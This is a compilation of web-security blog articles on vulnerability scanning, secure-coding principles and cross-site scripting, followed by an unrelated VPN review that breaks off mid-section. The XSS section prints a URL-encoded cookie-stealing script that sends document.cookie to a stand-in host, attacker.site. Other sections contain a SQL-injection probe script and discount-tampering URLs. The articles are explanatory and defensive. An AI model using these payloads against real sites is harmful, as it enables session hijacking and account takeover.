This feature of automatically generating ModSecurity rules for vulnerabilities identified by a web vulnerability scanner gives all users the ability to create and deploy ModSecurity rules immediately, saving valuable time and accelerating the whole scan-and-patch process considerably.

Figure 1. Generating ModSecurity Rules from a Web Application Vulnerability Scanner

ModSecurity is used by many vendors and webservice providers as it is capable of delivering a number of security services including:

  • Full HTTP traffic logging. ModSecurity gives you the ability to log anything you need, including raw transaction data, which is essential for forensics analysis and in-depth tracing.
  • Web Application Hardening. Helps fix cross-site request forgery vulnerabilities and enforce security policies with other Apache modules.
  • Real-time application security monitoring. ModSecurity provides full access to the HTTP traffic stream along with the ability to inspect traffic and act against attacks.
  • Becomes a powerful exploit prevention tool when paired with web server and web application vulnerability scanners such as Netsparker.

Most Web Application Vulnerability Scanner vendors provide full details on how to use their web application scanner to successfully generate ModSecurity rules that will help identify and block existing vulnerabilities in web applications and web servers.

Web Application Vulnerabilities – Benefits of Automated Tools & Penetration Testers

This article examines the differences between logical and technical web application vulnerabilities, which tends to be a confusing topic, especially for web application developers and security/penetration-testing experts, since it is easy to assume that a vulnerability is a vulnerability regardless of what it is called.

However, there are significant differences between technical and logical vulnerabilities which are critically important — especially if you are developing or penetration testing a web application.

Automated web application security scanners are indispensable when it comes to scanning for potential vulnerabilities. Web applications today have become complicated to the point where trying to eliminate all vulnerabilities manually is nothing short of foolish. The task is too large to even attempt and, even if you did, you would likely miss far too many as a result of human error.

Don’t let that lead you to believe that humans have no place in the process. While computers are indispensable in their ability to tirelessly scan for technical vulnerabilities, humans have the unique ability to not only think logically, but also analytically.

As a result, we still play a critical role in the process of identifying vulnerabilities in websites and web applications and will likely do so for some time to come.

But what is the difference between logical and technical vulnerabilities? And where should humans intervene in the detection process? To understand this, let’s take a closer look at the difference between the two.

Technical Vulnerabilities

Technical vulnerabilities are an area where automated scanners excel, since detection is a rule-based process. It is also time intensive, because of the vast number of attack vectors and potential vulnerabilities. For a human to complete this process, while possible, would be extremely expensive and likely full of both false positives and false negatives.

A common example of a technical vulnerability (for example SQL Injection) would be an application that requires information to be submitted by a user through a form. Any data submitted needs to be properly sanitized and failure to do so could make your application vulnerable to attack.

Testing for this is a simple task. For example, a hacker could probe for a vulnerability by submitting an email address with a single quotation at the end of the text. The response they receive might indicate the presence of a vulnerability.

Now, imagine your web application has 300 potential inputs. Without automation, the process would be time-consuming for both the hacker and the penetration tester. Luckily, the test and the potential result are predictable and repeatable. This makes testing for vulnerabilities like this relatively easy for an automated scanner. Speed and consistency are important in the testing process because it only takes one vulnerability to cause a problem.
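
As a hedged sketch of what such automation looks like, the snippet below appends a single quote to each of a handful of hypothetical form fields and looks for database error strings in the response; the URL, field names and error signatures are assumptions for illustration only.

import requests  # third-party: pip install requests

TARGET = "http://shop.example/contact"          # hypothetical form handler
FIELDS = ["email", "name", "phone", "comment"]  # hypothetical input names
ERROR_SIGNATURES = ["SQL syntax", "mysql_fetch", "ODBC", "ORA-01756"]

for field in FIELDS:
    # Send benign values everywhere, but terminate one field with a single quote.
    data = {f: "test" for f in FIELDS}
    data[field] = "test'"
    response = requests.post(TARGET, data=data, timeout=10)

    if any(sig in response.text for sig in ERROR_SIGNATURES):
        print(f"possible SQL injection via field: {field}")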

Logical Vulnerabilities

Logical vulnerabilities are much harder to detect, primarily because they require a human to think about and assess a potential problem. While it’s true that detection of some logical vulnerabilities can be programmed, it’s often cost-prohibitive to do so.

The ability to detect logical vulnerabilities can also be highly dependent upon experience. For example, consider a burglar trying to break into your house.

If the burglar only operated from a technical perspective, they might try to open each door and window in your house and come to the conclusion that it’s either locked or unlocked. If it’s locked, they would move on and try the next one. If it’s unlocked they would realize that a vulnerability is present.

On the other hand, if the burglar operated from a logical perspective and was experienced, they might look at your window and realize that it’s 25 years old. As a result of experience, they might realize that your locking mechanism could be worn out. By simply tilting the window in the right fashion, the lock might pop out of place and the window would open.

This is the kind of logical vulnerability that requires a human to expose it. Now, let's imagine you’re running an eCommerce store. You offer a 40% bulk discount for anyone who purchases 10 or more of a single item. Your web application creates a URL that looks like this when someone places a qualifying order:

/checkout/cart/couponPost?product=712&qty=10&coupon_discount=40

Now, imagine if someone came along and decided that they wanted the same 40% discount even if they only bought one item. They might try to use the following URL:

/checkout/cart/couponPost?product=712&qty=1&coupon_discount=40

Would the above URL enable them to bypass your quantity requirement? What about this one:

/checkout/cart/couponPost?product=712&qty=1&coupon_discount=90

Would this URL allow them to purchase a single item with a 90% discount?

These are just some basic examples of logical vulnerabilities that require input from a human. They also demonstrate the importance of using a security professional who is familiar with your industry and your application. That means hiring someone who has the right kind of experience and who can ask the right questions.

The good news about logical vulnerabilities is that, as a general rule, they are more difficult to find. Not only does a hacker require more skill to find them, but they also can’t use automated tools as easily.

The best real-world description of a logical vulnerability is when an attacker causes your web application to execute or to do something that was not intended to happen — as in the example above where someone was able to generate a discount that they should not have been entitled to.
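
A hedged sketch of how the discount logic could be enforced server-side, instead of trusting the URL parameters, is shown below; the 40%-for-10-items rule comes from the example above, while the function and constant names are assumptions.

BULK_DISCOUNT_PERCENT = 40
BULK_MINIMUM_QTY = 10

def applicable_discount(qty: int, requested_discount: int) -> int:
    """Recompute the discount from the business rules; never trust the client's value."""
    earned = BULK_DISCOUNT_PERCENT if qty >= BULK_MINIMUM_QTY else 0
    # Grant no more than the rules allow, no matter what the URL says.
    return min(requested_discount, earned)

# qty=1&coupon_discount=40  -> 0   (the logical bypass is refused)
# qty=1&coupon_discount=90  -> 0
# qty=10&coupon_discount=40 -> 40  (the legitimate case still works)
print(applicable_discount(1, 40), applicable_discount(1, 90), applicable_discount(10, 40))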

The Importance Of Assessing Technical & Logical Vulnerabilities

In order to properly assess a web application for vulnerabilities, it is critical to consider both technical and logical vulnerabilities. Automated tools are invaluable when it comes to efficiency and reliability. They are thorough, tireless and, when set up properly, very reliable.

But that does not mean human input can be removed from the process. When it comes to assessing a situation from a logical and analytical perspective and considering potential outcomes, the human mind wins the battle every time.

Hopefully, this post makes clear the importance of using both automated tools and live penetration testers. Neither is 100% reliable but, when used in conjunction with one another, they provide a solution that is both cost-effective and reliable. Read more about web application vulnerabilities and testing methods by visiting our Web Application security scanner section.

Top 3 Most Popular Web Application Vulnerabilities - Security Scans of 396 Open Source Web Applications

Since 2011, web application vulnerability scanners have scanned 396 open source web applications. The scanners identified 269 vulnerabilities, and a popular web vulnerability scanner published 114 advisories about the 0-day ones; 32 of the advisories include details about multiple vulnerabilities. According to these statistics, around 30% of the open source web applications scanned had some sort of direct-impact vulnerability.

Out of the 269 vulnerabilities detected, the web vulnerability scanners identified:

  • 180 were Cross-site Scripting vulnerabilities. These include reflected, stored, DOM Based XSS and XSS via RFI.
  • 55 were SQL Injection vulnerabilities. These also include the Boolean and Blind (Time Based) SQL Injections.
  • 16 were File Inclusion vulnerabilities, including both remote and local file inclusions.

The rest of the vulnerability types are CSRF, Remote Command Execution, Command Injection, Open Redirection, HTTP Header Injection (web server software issue) and Frame injection.

Automate Web Application Security - Why, How & The Necessary Tools

In this article, we’re going to talk about automating your web security in the safest and most effective way. We’ll also touch on a few web application security automation tools worth considering. Furthermore, we’ll discuss why it’s important to select the right web application scanning tool and how it can help meet your web development time frame, saving the company a lot of money and time.

Automation has been a popular buzzword in the digital space for a few years now. With the ability to reduce labour hours, eliminate repetitive tasks and improve the bottom line, it seems that everyone is looking for a way to automate their daily workflow to every extent possible. With web application security testing being both time-consuming and expensive, it’s a prime candidate for automation.

In the never-ending game of cat and mouse between developers, penetration testers and hackers, speed of execution plays a significant role in the identification and management of vulnerabilities. What makes the process even more challenging is the fact that both security professionals and hackers are using the same or similar tools.

If you’re not taking advantage of the ability to automate some of your security scanning, it’s only a matter of time until someone beats you to the punch. In almost all situations, it’s not a risk worth taking.

Despite all the positive aspects that arrive as a result of using an automated web security scanner, there are still some important points to consider during the implementation process in order to maximize your effectiveness.

Automation Starts With Planning

As with any undertaking, in order to achieve optimal results, it’s imperative that you follow a well thought out planning process. This means before you commence automated web vulnerability scanning, you should develop a plan that is specific, measurable, attainable and time-sensitive.

Reducing risk and searching for web application vulnerabilities requires nothing short of a detailed plan. You need to understand what a potential hacker might be looking for and where the most serious risks might lie, areas that will vary with every business. You also need a clear understanding of which tools you’ll be using as well as how they will be used.

Automating web security means having a plan that is measurable. This is best achieved through accurate reporting and open communication amongst your team. If a web application is in development, you should be testing at specific predetermined intervals throughout the development lifecycle. Writing vulnerable code on top of vulnerable code merely exacerbates the problem.

A plan that’s attainable will help to keep you on track. Consistent and methodical testing is always better than inconsistent and haphazard.

Finally, having a time-sensitive completion date is always vital to overall success. If your project never leaves the development and testing phase, it is still a liability from a business perspective, which is why many developers turn to automatic scanning tools from both the open-source and commercial sectors.

Automated Versus Manual Scanning

You might be asking, “how can an automated web vulnerability scanner possibly replace a human?” You’d be correct in your assumption that an automated scanner is no replacement for human intuition or experience. However, you’d probably also agree that manually scanning for hundreds or thousands of cross-site scripting (XSS) vulnerabilities across multiple web applications can quickly become an unrealistic proposition.

One of the keys to automating your web security is finding the appropriate timing and balance between using an automated scanner and a security professional. Intuition and experience are razor sharp at 7 AM, but their effectiveness and reliability have decreased significantly by 4 PM.

Use a human element where necessary and automate everywhere else. We discussed this recently when comparing technical and logical vulnerabilities, and it’s clear that while many of the vulnerabilities listed in the OWASP top 10 require human logic, there are many that do not – efficient allocation of human resources has financial benefits and can also improve the effectiveness of logical analysis.

Choose Your Tools

Once you’ve outlined a plan, it’s time to select your tools. There are a variety of tools available for your consideration and evaluating web application security scanners is not an easy job. Use any tool you are comfortable with. It’s also important to note that experienced penetration testers have learned that it’s best not to rely on one single tool.

Deciding on an automated security scanner often raises the debate between free and open source versus paid commercial platforms. There is no right or wrong answer.

An example of an open source platform for someone who is developing their own application would be a tool such as the OWASP Zed Attack Proxy. It’s relatively easy to use and provides both active and passive scanning, a spider, full reporting and a brute force component that can help to find files with no internal links.

On the other hand, you might also want to consider a commercial web application security scanner. More often than not, they offer a superior user-interface, more consistent updates, as well as better support. On balance, a commercial scanner is often more user-friendly and functional with frequent updates as the developer has a vested interest in offering a high-quality product.

Although open source tools like OWASP ZAP offer a multitude of functionality, best practices dictate that you also use tools dedicated to a specific task. For example, DirBuster and Wfuzz are two tools designed specifically for bruteforcing web applications.

By using a variety of tools, some of which overlap in functionality, you’re more likely to identify and expose a greater number of vulnerabilities.

Implement & Iterate

There is no magic recipe or secret sauce when it comes to automating your web application security scanning. It’s a process that relies heavily on a combination of smart planning, the right tools and the necessary experience.

It’s also important to remember that automation is about more than saving time and money. It’s about strategically implementing a process designed to efficiently reduce the vulnerability of your web applications –  letting both software and humans do what they do best.

Web Application Security Best Practices that Help in Securing Your Web-Enabled App

Successful web application attacks, and the data breaches that result from them, have now become everyday news, with large corporations being hit constantly.

Our article covering major security breaches in well-known companies clearly demonstrates that there are many gaps in web security, which are causing multi-million dollar damages to companies worldwide. In this article we analyze the best security practices and principles to help increase your web application security.

While security experts are adamant that there is still much to improve in most web applications’ security, the gaping security holes that attackers are exploiting are still present, as confirmed by the latest string of attacks on Yahoo and several departments of the United States government.

These attacks, as one can imagine, are the cause of financial loss as well as loss of client trust. If you held an account with a company that suffered a data breach, you would think twice before trusting that company with your data again. Recently, developers have been brought into the fold with regards to web application security; a field that a couple of years ago was only relevant to security professionals whose jobs revolve around security. Nowadays, security has become a requirement that has to be implemented, for a web application developer to meet all the necessary deliverables. Security needs to become a part of the development process, where it is implemented in the code that is being written, and not just as an afterthought that becomes relevant after an attack.

Security has to be a part of every step of the software development life cycle due to its importance. A chain is only as strong as its weakest link, as is a web application - a low level vulnerability can provide an attacker with enough of a foothold that will allow the attacker to escalate the exploit to a higher level. Below are some principles that every web application developer should follow throughout the SDLC, to ensure that they are writing code that is secure enough to withstand any potential attack.

The Defense in Depth Approach

Defense in depth is a concept whereby a system that needs to be secured, will sit behind multiple layers of security. Here, redundancy is key, so that if a security mechanism fails, there will be others that will catch the vulnerability or block its exploitation. It is important that these layers of security are independent from each other and that if one is compromised, the others will not be affected. It would appear that integrating the mechanisms with each other can make for a better security system, such as if one security mechanism detects a vulnerability, it will alert the others so that they can be on the lookout for anything that the first mechanism might have missed. This is not the case, as it will only make for a weaker defense. If the first layer is compromised, it could lead to the other layers being compromised as well, due to their integration which leads us to the fact that having separate and independent mechanisms is the best implementation to go with.

One example of implementing a defense in depth approach would be to restrict an administrator panel so it can be accessed only from a particular IP address. Even though, in most cases, there is enough protection in using credentials in the form of a username and password to log into the admin panel, the added layer of protection will come in handy. If the password is disclosed to an attacker, that protection is no longer valid on its own, making the login setup irrelevant. By implementing another small but robust security feature, you move closer to making your defense infallible.

On the other hand, a security feature should not be a complete inconvenience to the user. For example, allowing access to an admin panel from one IP address makes sense, but requiring the user to pass through too many security checks, will lead the user to take certain shortcuts that will render all the security features that have been set up, futile.

For example, if you request a user to change their password every day, you can be sure that these passwords will be written down on a piece of paper, thus making the environment less secure than what it was to begin with. Which is why there needs to be a balance of making sure that a system is secured, while still allowing users to utilise the system.

Filtering User Input

The key principle is not to trust the end user, since one can never know for sure if the user’s intent is malicious or if the user is simply using your website for its intended purpose. Filtering user input is a good method that will allow your web application to accept untrusted inputs while still being safe to use and store that input.

There are many ways to filter input, depending on the vulnerabilities that are being filtered against. The problem that comes with not filtering user input does not end at the web application itself, since this input will be used subsequently. If the malicious input is not filtered, certain vulnerabilities such as SQL Injection, Cross Site Request Forgery and Cross-site Scripting can be exploited.

Cross-site Scripting (XSS) works because the browser or web application, depending on the type of XSS, will execute any code that it is fed through user input. For example, if a user enters:

<script>alert('Exploited Vulnerability')</script>

And this input is not sanitised, this snippet will be executed. To ensure that this input will not be executed, the data needs to be sanitised by the server.

Filtering user input should always be done on the server side because, once again, the user can never be trusted. If JavaScript is used for checks on the client side, there are ways to bypass them, but implementing the check on the server ensures that no malicious input will get past the filter.
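
As a minimal sketch of one common form of server-side sanitization, output encoding, the snippet below uses Python's standard html module to escape untrusted input before it is rendered; the surrounding request handling and the wrapper function are assumptions.

import html

def render_comment(untrusted_comment: str) -> str:
    """Escape user input before it is placed inside an HTML page."""
    # html.escape turns < > & " ' into their HTML entities, so a payload such as
    # <script>alert('Exploited Vulnerability')</script> is displayed as text
    # instead of being executed by the browser.
    return "<p>" + html.escape(untrusted_comment, quote=True) + "</p>"

print(render_comment("<script>alert('Exploited Vulnerability')</script>"))
# <p>&lt;script&gt;alert(&#x27;Exploited Vulnerability&#x27;)&lt;/script&gt;</p>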

Principle Of Least Privilege

This principle applies to both applications and users, where the amount of privileges that are provided need to be equivalent to the privileges that are required for them to fulfill their purpose. For example, you would not provide a user who uses their machine for word processing with the authority to install software on that machine.

The same goes for applications - you would not allow an application that provides you with weather updates, with the authority to use your webcam. Apart from the obvious issue where the user (and application) cannot be inherently trusted as they can have malicious intent, the user can also be fooled into performing actions using the allowed authority. For example, the best way to prevent a user from unintentionally installing malware, would be to not allow the user to install anything in the first place.

If a web application will be handling SQL queries and returning the results, the database process should not be running as administrator or superuser, since this brings with it unnecessary risks. If user input is not being validated and an attacker is able to execute a query of their own, with enough time and the appropriate privileges the attacker can perform any action they wish, since they would be running as admin or superuser on the machine hosting the database.

Whitelist, Not Blacklist

This choice will generally depend on what is actually being protected or what access is allowed. If you want the majority of users to access a resource, you will use a blacklist approach, while if you want to allow certain users, a whitelist approach is the way to go. That being said, there is the easier way and the safer way. Whitelisting is considered safer due to the ambiguity of blacklists.

In a blacklist, everything is allowed except the entries that are explicitly listed, while in a whitelist, anything that is not listed is denied by default. This makes whitelisting more robust when it comes to controlling user input, for example. It is safer to explicitly allow a set of characters that a user may input, so that any special characters that could be used for an attack are excluded automatically. Blacklisting, by default, allows anything, so if the list of exclusions does not cover every possible attack parameter and its variations, there is still a chance of malicious user input being accepted and passing through the filter.

The amount of variation and obfuscation techniques that have become widespread make the whitelisting approach more desirable. Blocking <script> from user input will not be enough since more advanced techniques are being implemented that are being used to bypass filters that normally search for <script> tags.

For example, if you have a registration form, where a user is prompted to enter their designation, it is much safer to allow all the possible designations (Mr, Mrs, Ms, Dr, Prof., etc.) than having to block all the possible attack parameters that an attacker could use instead of actually inputting their designation.
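
A short sketch of the whitelist idea applied to the designation example follows; the allowed values are taken from the paragraph above and everything else (the function name, the error handling) is an assumption.

ALLOWED_DESIGNATIONS = {"Mr", "Mrs", "Ms", "Dr", "Prof."}

def validate_designation(value: str) -> str:
    """Whitelist check: anything not explicitly listed is rejected by default."""
    value = value.strip()
    if value not in ALLOWED_DESIGNATIONS:
        raise ValueError("invalid designation")
    return value

print(validate_designation("Dr"))                    # accepted
# validate_designation("<script>alert(1)</script>")  # raises ValueError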

Finally, the most important principle of all is that, however many precautions and security measures are taken, they are still not enough. This is due to two factors. The first is that thinking highly of your web application’s security will leave you complacent and with a false sense of security, where you are sure that your web application is safe from any potential threat. This can never be the case, since every day new advanced threats emerge that could bypass all the security that has been implemented. This leads us to the second point: successful security techniques are evolving on a daily basis. It is the developer’s responsibility to remain up to date with emerging security techniques and threats, since there is always room for improvement when it comes to security.

We left this principle for last; you never know enough. That’s right, we never know enough. Web application security, like any other IT security related subject is evolving on a daily basis. Keep yourself informed by reading and following industry leading web application security blogs.

Creating a Cross-site Scripting (XSS) Attack. Understanding How XSS Attacks Work & Identifying Web Vulnerabilities

Part two of our Cross-site Scripting (XSS) series shows how easy it is to create and execute an XSS attack, helping readers and network security engineers understand how XSS attacks work and how to identify web application vulnerabilities. Part one explained the concept of XSS attacks while also analyzing the different types of XSS attacks.

XSS exploits can be incredibly simple. The simplest attack grabs the user’s cookie contents and sends it to another server. When this happens, the attacker can extrapolate the user’s session information from what he receives, spoof his cookies to appear as if he is the victimized user, and gain unauthorized access to that user’s account. Obviously, if the user is privileged, like a moderator or administrator, this can have serious ramifications.

As an example, think of an error message page where the message itself is part of the website address (known as a Uniform Resource Identifier, or URI), and is directly presented to the user. For this example, say that web page acts as follows:

Request URI: /error.page?message=404 Error – Content Not Found

1. <html><head><title>Error</title></head><body>
2. An error occurred:<br />
3. 404 Error – Content Not Found
4. </body></html>

In line 3, you can see the idea behind the page: the error message provided via the query string variable message is printed to the user. If the page does not sanitize this value in any way, such as stripping HTML tags out, an attacker can inject anything.

They can also mask that injection a little by substituting characters with URL-encoded values. If they wanted to steal cookies from a user via this error page, they could do so as follows:

Request URI: /error.page?message= %3Cscript%3Evar+i%3Dnew+Image%28%29%3Bi.src%3D%22http%3A//attacker.site/cookie%3Fvalue%3D%22+document.cookie%3B%3C/script%3E

1. <html><head><title>Error</title></head><body>
2. An error occurred:<br />
3. <script>var i=new Image();i.src="http://attacker.site/cookie?value="+document.cookie;</script>
4. </body></html>

First, notice the oddity of the message in the URL. Those two-character values prefixed with a percent sign (%) are hexadecimal numbers representing each character: %3C for <, %3D for =, and so forth. This is a mild form of obfuscation, allowing the browser to understand the string while confusing the user reading it.
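
To see how thin this layer of obfuscation is, the short Python snippet below (standard library only) decodes the hexadecimal sequences; the encoded string used here is a shortened version of the payload shown above:

from urllib.parse import unquote, unquote_plus

# Each %XX sequence is simply the hexadecimal code of an ASCII character.
print(unquote("%3C"), unquote("%3D"), unquote("%22"), unquote("%3B"))   # prints: < = " ;

# Decoding a shortened version of the payload; in query strings '+' stands for a space.
encoded = "%3Cscript%3Evar+i%3Dnew+Image%28%29%3B%3C/script%3E"
print(unquote_plus(encoded))   # prints: <script>var i=new Image();</script>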

In line 3, you can see that the browser properly understood the string and evaluated it into some JavaScript. In this particular example, the attacker has a script on his server that captures user cookie data by tricking the browser into loading that page as an image object. That object passes along the user’s cookie contents for the website to the attacker. That attacker now has the victim’s IP address, cookie data, and more, and can use this information to gain unauthorized access to the victimized user’s account, or worse, to more privileged areas of the website if the victimized user account had elevated rights.

Different Kinds Of XSS Vulnerabilities

This is also only one example of the various kinds of XSS attacks that can be executed. XSS attacks fall into three general categories as defined by OWASP: Stored (Persistent) XSS, Reflected XSS, and DOM-based XSS. Stored XSS attacks, as their name implies, are stored unsanitized on the website (such as in a database entry) and rendered on page load (this is how the Samy worm operated). Reflected XSS attacks are usually more common, often the result of data in an unsanitized URI string being rendered by the website's frontend code (as in the example above). The final type, DOM-based XSS, exploits the Document Object Model environment in a similar way to a reflected attack, but by altering the page's elements dynamically.

Identifying XSS Vulnerabilities In Your Web Applications

There is no real catch-all that can prevent every XSS exploit, due to the highly dynamic nature of these attacks and the complexity of modern libraries and frameworks such as jQuery and Bootstrap. However, a good place to start is with a web application security scanner, which automatically searches for these kinds of exploits and more, and provides suggestions on how to fix the identified XSS vulnerabilities. Sanitization is critical anywhere data is received by a website (user input, query strings, POST form data, etc.), and a good security scanner can show you where sanitization is missing.
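
As a simple illustration of that sanitization step, the minimal Python sketch below HTML-escapes a user-supplied value before it is echoed back to the browser; the variable names are hypothetical and this is only one layer of defence, not a complete fix:

import html

# Hypothetical user-supplied value taken from the error page's query string.
message = '<script>var i=new Image();i.src="http://attacker.site/cookie?value="+document.cookie;</script>'

# html.escape() converts &, <, > and quotes into HTML entities, so the browser
# renders the payload as harmless text instead of executing it.
safe_message = html.escape(message)
print(safe_message)
# &lt;script&gt;var i=new Image();i.src=&quot;http://attacker.site/cookie?value=&quot;+document.cookie;&lt;/script&gt;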


What is Cross-site Scripting (XSS)? Why XSS is a Threat, how does XSS Work? Different Types of XSS Attacks

Part one of our two-part series on Cross-site Scripting (XSS) explains what XSS attacks are. We also take a close look at how XSS exploits work (URLs, cookies, web cache, etc.) and analyze their impact on business websites and web servers, using real examples of popular sites that were hit by different XSS exploits. We also cover the different types of XSS attacks, which are very difficult for website users to identify and detect. Part two provides a Cross-site Scripting attack example, discusses the different types of XSS vulnerabilities and explains how to identify XSS vulnerabilities in your web applications and web servers.

Part two analyzes XSS attacks, showing how easy it is to create an XSS script, and provides useful information on how to identify XSS vulnerabilities.

Websites typically have two sides to them: the backend and the frontend. On the backend are the familiar layers of systems that generate the elements for the frontend: the web application service, the language renderer (e.g. PHP or Python), the database, and so forth. These areas are commonly the ones most focused on when it comes to securing a website, and rightfully so; some of the most damaging hacks in history were the result of successful attacks on backend systems. But the frontend, where HTML, CSS and especially JavaScript live, is equally susceptible to attack, with considerable fallout as well.

Cross-site scripting, which is more commonly known as XSS, focuses the attack against the user of the website more than the website itself. These attacks utilize the user's browser by having their client execute rogue frontend code that has not been validated or sanitized by the website. The attacker leverages the user to complete their attack, with the user often being the intended victim (such as by injecting code to infect their computer). The user loads a trusted website, the rogue script is injected somehow, and when the page is rendered by their browser that rogue script is executed. With more websites performing their actions as browser-rendered code instead of in Flash or with static pages, it is easy to see why XSS can be a significant threat.

Why Is XSS A Threat & How Does It Work?

An XSS attack can be quite dangerous for the users of a website, and not just because of the trust the site may lose from its customers. When a user accesses a website, much of its content is often hidden behind some form of authentication – like how Facebook is practically useless unless you have an account. That authentication not only hides privileged information, but also provides access to the account itself (social media information, the ability to make purchases, etc.). Some of the information required for that authentication is stored on the user's computer, namely in the form of cookies. If a user's cookies can be compromised via an injected XSS exploit, their account can be hijacked as well.

This can have huge ramifications, especially on larger Content Management System (CMS) platforms and even social media websites. The software project management service JIRA found itself the target of an XSS exploit that affected large software organisations such as the Apache Software Foundation. This caused administrator accounts to become compromised, which could have led to a cascade of further compromise: data, company secrets, proprietary software, etc. In fact, if you were ever a user of MySpace (remember that website?), you probably heard of the most infamous XSS exploit: the JS.Spacehero worm, also known as the MySpace Samy worm. These attacks not only caused serious problems with account compromises, but considerable financial loss as well. Even though the Samy worm was basically harmless, it spread exponentially in less than a day and forced MySpace to take itself offline for several hours, reportedly costing them over $1 million USD in revenue.

Different Types Of XSS Attacks

XSS exploits can take a number of forms, which makes them very difficult for website users to detect. An innocuous short-URL link (like TinyURL or Bitly) to a website, a forum signature image, a modified website address, even something completely hidden from view (e.g. obfuscation, where it is written in an intentionally confusing, illegible manner) – any of these and more can be used to accomplish an XSS exploit. In fact, if a user's browser can load it (such as an image) or execute it (such as code), there exists opportunity for an XSS exploit.


Best VPN Review: StrongVPN. Download Speed Test, Torrenting, Netflix, BBC, HULU, DNS Leak Test, Security, VPN Options, Device Support and more

StrongVPN is one of the most popular VPN services around the world. With a presence in over 23 countries, 650+ servers, cheap prices, strong encryption and blazing fast download speeds, it rightfully deserves the No.1 position in our Best VPN Review.

This in-depth review took weeks to write, as we performed extensive testing on workstations and mobile clients: downloading, VPN torrenting, security tests, VoIP & video latency, gaming and more, in an attempt to discover any flaws, issues or limitations the VPN service might have.

Without any further delay, let’s take a look and see what StrongVPN was able to deliver during these very challenging tests!

Positives:

  • Ranked No.1 in our Best VPN Service review
  • Superfast Download/Upload Speeds supporting Torrents
  • Very low Latency
  • Strong Encryption
  • Zero-Log Policy
  • Effective DNS Leak, IP Leak & WebRTC Protection
  • Cheap for 12 month signup plans 

Concerns:

  • Kill-switch
  • 5 day money-back guarantee period

Visit StrongVPN

Overview 

StrongVPN is one of the oldest providers in the industry, beginning as a humble PC company in 1994. A subsidiary of Reliable Hosting, the VPN service was created after a move to San Francisco prompted the company to start selling VPN services.

The US-based company doesn't promise a whole lot on its website, but under the hood it's a fast VPN with a no-log policy and great customer service. It supports 5 concurrent connections for $3.80 per month under a yearly package!

While some of the best VPNs focus on a wide range of servers, StrongVPN prioritises speed and the ability to unblock Netflix. It has servers in 45 cities across 23 countries, most of which can bypass region blocks.

Such functionality has made StrongVPN very popular in China and other countries with aggressive blocking policies. This review will analyze the benefits for a new, global audience.

Ease of Use – StrongVPN GUI Interface

StrongVPN’s install is as simple as it gets. Users are presented with a regular installer and just have to hit next until it’s complete. StrongVPN intelligently installs TAP drivers, requiring no extra prompts. After completion, the application will launch automatically.

At first glance, StrongVPN’s interface is simple. It presents your location, a list of servers, and VPN protocol used to encrypt traffic. Most users will never have to go outside of this interface, leaving a minimal, simple experience.

The StrongVPN client - Probably not the best looking GUI but surely the best service

Once you drill down into settings, things get more complex. Though well-labelled, there’s a lot of information with no tooltips or tutorial. However, these are presented as advanced options so, naturally, they are targeted at power users.

They also provide some information that’s useful to everyone. By default, StrongVPN launches an Information page, which gives account details, launcher version, subscription length, and more. This makes it easier to provide relevant details to support agents, and isn’t something you see often:

StrongVPN client information window

It isn't the best VPN client we've seen in terms of ease of use, but the default screen is still simple and the advanced options provide unprecedented customization. Though it was slightly slow to connect to some servers, that was mitigated by a stable experience afterwards.

VPN Client Platform Availability

The clunkiness of StrongVPN's client can also be forgiven by its availability. It's one of the few clients that states support for all modern versions of Windows, from Windows XP through to Windows 10. Mac support is solid too, with an installer from Yosemite upwards. For Mac users on older systems, there's a legacy client that works just fine.

Like all of the best VPNs, there’s support for Android and iOS, too. iPhones, iPads and iTouch devices are supported on iOS 9 and up. Android goes back a little further, with support for Ice Cream Sandwich (4.0) and above.

For other platforms, StrongVPN provides some of the most comprehensive guidance we've seen. There are tutorials for Windows Phone, Windows Mobile, Microsoft Surface and more.

StrongVPN Mobile client - Great looking interface with heaps of options

The mobile apps aren’t the prettiest we’ve seen, but it’s hard to deny the simplicity. StrongVPN has gone for a very barebones interface with a simple button to enable and disable the connection. Though the settings menu isn’t quite where you’d expect it to be, it presents information in a much simpler format than the desktop client.

However, things get a little more complex once you move to Linux. StrongVPN doesn’t provide a dedicated installer for any of the distributions. That’s a very common move, as it’s difficult to provide options for all the different versions, and Linux users tend to be more advanced anyway.

Thankfully, StrongVPN does provide some excellent guidance that makes it much easier. Picture guides are provided for Linux in general and Ubuntu. Some of these take the form of forum posts, while others are detailed picture guides.

Reliable Hosting also gives recommendations to users who are stuck between PPTP, L2TP, and OpenVPN. PPTP is recommended for Ubuntu as it's the simplest setup and deemed adequate for casual browsing, video streaming, gaming, VoIP/video calls and so on.

Despite this, OpenVPN is quite easy to get working with StrongVPN. The guide for Ubuntu requires minimal command line input and, for other distributions, command line and network manager tutorials are available.

Of course, you can set up OpenVPN on Windows and Reliable Hosting has picture guides for that too. The setup is a little more involved than some, requiring a different username and password than the usual client. Those details are hidden away in a sub-menu, but thankfully the tutorial points you to the right place. 

Connecting to StrongVPN using OpenVPN client

Connecting to StrongVPN using OpenVPN client

With a little effort, we were able to get OpenVPN working with the service just fine. Support was also happy to help with this, and provided valuable advice.

Router VPN Support 

It’s clear that Reliable Hosting has some of the best VPN guidance, and that extends to routers. Though StrongVPN doesn’t have its own OS, it does support a wide range of router firmwares via PPTP and OpenVPN.

In fact, Reliable Hosting has some of the best VPN router guides we’ve seen. The company provides setup tutorials for the popular DD-WRT and TomatoUSB. However, it also goes a step further, with support for the Sabai and Mikrotik Router OS’s.

There are options for less advanced users. StrongVPN sells routers pre-flashed with SabaiOS so that no setup is required. The Tomato-based router OS makes it simple to use VPNs with routers, and requires very little configuration.

Though the routers are shipped by Sabai technology, Reliable Hosting handles the payment. You can also buy a VPN subscription alongside it for less micromanagement.

VPN Privacy, Security and Encryption

StrongVPN's multitude of platforms is enhanced by its support for various encryption options. As with most modern clients, StrongVPN uses OpenVPN with either UDP or TCP by default. However, it also supports PPTP, L2TP, and SSTP.

Though StrongVPN used to offer different encryption levels depending on your package, that’s no longer the case as all packages now have access to all supported encryption methods. This opens up connections on more niche devices, and provides varying degrees of speed and security. You can find out more about the various protocols in our beginner’s guide to VPNs.

Despite the options, OpenVPN will be the choice of most users. StrongVPN provides up to 256-bit AES encryption via this method, its highest level. It's the strongest VPN encryption in the industry, used by law enforcement agencies and privacy experts alike.

StrongVPN comes with kill switch functionality. The option isn’t immediately obvious, labeled as Allow direct traffic while reconnecting. Unchecking the option will make sure your PC doesn’t transmit any data if the VPN connection drops. However, it’s worth noting that its implementation is questionable, as we have covered below.

To further its anonymous browsing features, Reliable Hosting provides its users with its StrongDNS service for free. This mitigates issues like DNS leaks, which you can read more about here. The user is given the IP address of dedicated DNS servers via a separate client or through manual setup.

DNS Leak Protection Test

